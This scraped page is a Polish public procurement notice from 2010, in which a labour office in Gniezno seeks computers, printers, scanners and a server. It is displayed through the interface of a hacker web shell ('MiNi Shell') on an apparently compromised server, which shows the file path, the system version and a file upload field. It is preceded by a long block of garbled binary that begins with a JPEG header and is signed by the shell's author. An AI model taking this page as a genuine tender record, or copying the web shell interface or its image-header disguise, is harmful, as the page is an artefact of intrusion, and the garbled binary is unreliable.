JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100615/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100615/168900-N-2010.html

<p class="kh_header"><b>Gniezno: Dostawa fabrycznie nowych komputerów stacjonarnych PC, drukarek, skanerów, komputerów przenośnych typu laptop, monitorów do komputera, serwera i serwerowego systemu operacyjnego wraz z licencjami dostępowymi CAL oraz akcesoriów do komputerów (myszy USB, Klawiatury USB, pendrive, sprężone powietrze, pianki do czyszczenia obudowy, podkładki pod mysz, listwę zasilającą, konwerter USB - SATA/IDE, adapter VGA - 2X VGA, czytnik kart pamięci)  dla Powiatowego Urzędu Pracy w Gnieźnie</b><br>
<b>Numer ogłoszenia: 168900 - 2010; data zamieszczenia: 15.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Sobieskiego 20, 62-200 Gniezno, woj. wielkopolskie, tel. 061 4261649, faks 061 4261162.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowych komputerów stacjonarnych PC, drukarek, skanerów, komputerów przenośnych typu laptop, monitorów do komputera, serwera i serwerowego systemu operacyjnego wraz z licencjami dostępowymi CAL oraz akcesoriów do komputerów (myszy USB, Klawiatury USB, pendrive, sprężone powietrze, pianki do czyszczenia obudowy, podkładki pod mysz, listwę zasilającą, konwerter USB - SATA/IDE, adapter VGA - 2X VGA, czytnik kart pamięci)  dla Powiatowego Urzędu Pracy w Gnieźnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa: 
 - komputerów stacjonarnych PC - szt. 5, 
- skanerów nabiurkowych z podajnikiem dokumentów - szt. 5, 
- drukarek laserowych monochromatycznych - szt. 5,  
- monitorów do komputerów - szt. 8, 
- komputerów przenośnych typu laptop - szt. 10, 
- serwera - szt. 1, 
- serwerowego systemu operacyjnego wraz z 75 licencjami dostępowymi CAL
-  akcesoriów do komputerów (myszy USB, Klawiatury USB, pendrive, sprężone powietrze, pianki do czyszczenia obudowy, podkładki pod mysz, listwę zasilającą, konwerter USB - SATA/IDE, adapter VGA - 2X VGA, czytnik kart pamięci)  
2. Wykonawca zobowiązany będzie bez dodatkowych opłat ze strony Zamawiającego dostarczyć do Powiatowego Urzędu Pracy w Gnieźnie wyżej określony przedmiot zamówienia, wnieść i rozładować w miejscu wskazanym przez Zamawiającego.
3. Szczegółowy opis potrzeb Zamawiającego, zawierający rodzaj sprzętu wraz z wyposażeniem i serwerowego systemu operacyjnego wraz z licencjami dostępowymi CAL został zawarty w załączniku nr 5 do niniejszej specyfikacji.  
4. Wymagania dotyczące sposobu realizacji zamówienia
1) Wykonawca zobowiązuje się do udzielenia gwarancji na okres 36 miesięcy dla komputerów PC, monitorów, drukarek, skanerów, na okres 60 miesięcy dla serwera oraz 12 miesięcy na akcesoria dla komputerów (myszy, klawiatury, pendrivey, konwerter USB - SATA/ IDE, Adapter VGA, czytnik kart pamięci USB) liczony od dnia podpisania protokołu odbioru. Usługi gwarancyjne będą świadczone przez producentów niniejszego sprzętu  lub podmioty autoryzowane przez producenta sprzętu do prowadzenia serwisu w jego imieniu. 
2) Wraz ze sprzętem oraz serwerowym systemem operacyjnym wraz z licencjami dostępowymi CAL Wykonawca przekaże Zamawiającemu wzór formularza zgłoszenia serwisowego.
3) Usługi serwisowe, świadczone przez Wykonawcę w okresie objętym gwarancją, będą bezpłatne.
4) Zgłoszenia serwisowe będą przyjmowane: 
a) faksem pod numer: 
b) telefonicznie, w dni robocze, w godz. 07:00 - 15:30, tel. 
c) pocztą elektroniczną na adres e-mail: 
d) na stronie internetowej:  
5) W okresie obowiązywania gwarancji, Wykonawca zapewni Zamawiającemu wsparcie techniczne, dostępne w dni robocze w godz. 07:00 - 15:30, obejmujące udzielanie porad technicznych, instrukcji i konsultacji telefonicznych dotyczących eksploatacji, funkcjonowania, użytkowania i obsługi sprzętu komputerowego i serwerowego systemu operacyjnego wraz z licencjami dostępowymi CAL dostarczonego w ramach umowy. Wsparcie techniczne będzie dostępne za pomocą telefonu oraz poczty elektronicznej. 
6) Usługa serwisowa jest inicjowana przez zgłoszenie awarii  za pomocą następujących mediów: faksem i pocztą elektroniczną (całodobowo) oraz telefonicznie (dni robocze, w godz. 07:00 - 15:30).  
7) Zgłoszenie telefoniczne będzie potwierdzane faksem, bądź pocztą elektroniczną, poprzez przesłanie formularza zgłoszenia serwisowego do Wykonawcy z podaniem objawów błędu.
8) Gwarantowany czas usunięcia niesprawności komputerów stacjonarnych PC, monitorów do komputerów, drukarek, skanerów, komputerów przenośnych oraz akcesoriów komputerowych  wynosi 4 dni robocze, a w przypadku serwera 24 godziny, od momentu dokonania prawidłowego zgłoszenia. W przypadku braku możliwości usunięcia awarii z przyczyn technicznych, powodujących przekroczenie gwarantowanego terminu, Wykonawca musi zapewnić sprzęt zastępczy o parametrach nie gorszych w stosunku do uszkodzonego, aż do terminu wykonania naprawy. Oprogramowanie oraz dane zostaną zainstalowane przez Wykonawcę na sprzęcie zastępczym wg wymagań Zamawiającego z nośników będących w jego posiadaniu. 
9) Naprawa wykonywana będzie w siedzibie Zamawiającego, w dni robocze od poniedziałku do piątku, w godz. 07:30 - 15:30
10) Jeżeli Wykonawca uzna to za konieczne, naprawa może być dokonana poza siedzibą Zamawiającego w takich przypadkach Wykonawca:
- zapewni sprzęt zastępczy o parametrach nie gorszych w stosunku do uszkodzonego, aż do terminu wykonania naprawy, 
- transportuje sprzęt do miejsca naprawy, a po naprawie do siedziby Zamawiającego na własny koszt i ryzyko. 
11) W sytuacji, o której mowa w ust. 10, Zamawiający nie ma obowiązku udostępnienia dysków twardych, które zostały zainstalowane w uszkodzonym sprzęcie komputerowym. Powyższe ograniczenie nie może skutkować brakiem wykonania usług gwarancyjnych odnośnie pozostałych elementów uszkodzonego sprzętu.
12) W przypadku uszkodzenia dysku twardego i stwierdzenia potrzeby jego wymiany na nowy, uszkodzony dysk nie podlega zwrotowi Wykonawcy.
13) W przypadku awarii sprzętu, której usunięcie przekracza termin 10 dni roboczych, Wykonawca dokona wymiany uszkodzonego sprzętu na nowy o parametrach nie gorszych od sprzętu uszkodzonego.
14) Po wykonaniu naprawy, Wykonawca musi przywrócić naprawiany sprzęt do stanu pełnej gotowości do pracy, tj. zgodnie ze stanem jak przed wystąpieniem awarii.
15) Okres gwarancyjny zostanie przedłużony o łączną liczbę dni, w których sprzęt był wyłączony z eksploatacji, z powodu naprawy podczas trwania okresu gwarancyjnego.
16) Pracownicy obsługi informatycznej Zamawiającego mają prawo do otwierania obudów i rozbudowy konfiguracji podstawowych sprzętu komputerowego.
Procedura odbioru sprzętu
1.Dostarczone komputery stacjonarne, komputery przenośne typu laptop, monitory do komputerów, drukarki, skanery, serwer, akcesoria komputerowe muszą być przed dostawą do Powiatowego Urzędu Pracy w Gnieźnie przetestowane, fabrycznie nowe i sprawne technicznie.
2.Sprzęt określony w opisie przedmiotu zamówienia zostanie dostarczony przez Wykonawcę do siedziby Zamawiającego w terminie nie później niż 21 dni od daty podpisania umowy.
3.Koszty dostawy i wyładunku ponosi Wykonawca.
4.Wykonawca z którym Zamawiający podpisze umowę zobowiązany jest dostarczyć, wydane przez producentów sprzętu, karty gwarancyjne w języku polskim potwierdzające udzielenie gwarancji na okres oraz na warunkach określonych w niniejszym zamówieniu.
5.Odbiór sprzętu komputerowego wraz kartami gwarancyjnymi zostanie udokumentowany protokołem odbioru dostawy podpisanym przez przedstawiciela Wykonawcy oraz przedstawiciela Zamawiającego.  
6.Protokół odbioru dostawy zostanie sporządzony w dwóch egzemplarzach, po jednym dla Zamawiającego i Wykonawcy.
7. Podpisanie bez zastrzeżeń przez obie Strony protokołu odbioru dostawy stanowi potwierdzenie wykonania przedmiotu zamówienia zgodnie z wymaganiami umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.33.00-8, 30.21.31.00-6, 30.21.61.10-0, 30.23.21.10-8, 30.23.72.00-1, 48.82.20.00-6, 48.62.40.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie niezbędnej wiedzy i doświadczenia Wykonawcy muszą wykazać, że w czasie określonym w pkt. VII SIWZ ppkt 2a, wykonywali co najmniej jedną dostawę odpowiadającą wartością (tzn. nie niższą niż 100 000,00 zł. każda dostawa) i zakresem niniejszemu przedmiotowi zamówienia (tzn. np.: dostawa komputerów stacjonarnych, drukarek, monitorów do komputerów, skanerów, komputerów przenośnych typu laptop, serwerów wraz z licencjami dostępowymi CAL, akcesoriów komputerowych). Do wykazu należy dołączyć dokument potwierdzający należyte wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Ceryfikat potwierdzający spełnienie przez serwer norm ISO-14001 lub certyfikat równoważny spełniający warunki ciągłego doskonalenia w działaniach danej organizacji dotyczących systemu zarządzania środowiskiem. 
b) Potwierdzenie zgodności CE lub równoważny potwierdzający możliwość umieszczenia produktu na rynku europejskim.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-gniezno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Gnieźnie
ul. Sobieskiego 20
62-200 Gniezno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2010 godzina 14:00, miejsce: Powiatowy Urząd Pracy w Gnieźnie
ul. Sobieskiego 20
62-200 Gniezno
Biuro podawcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com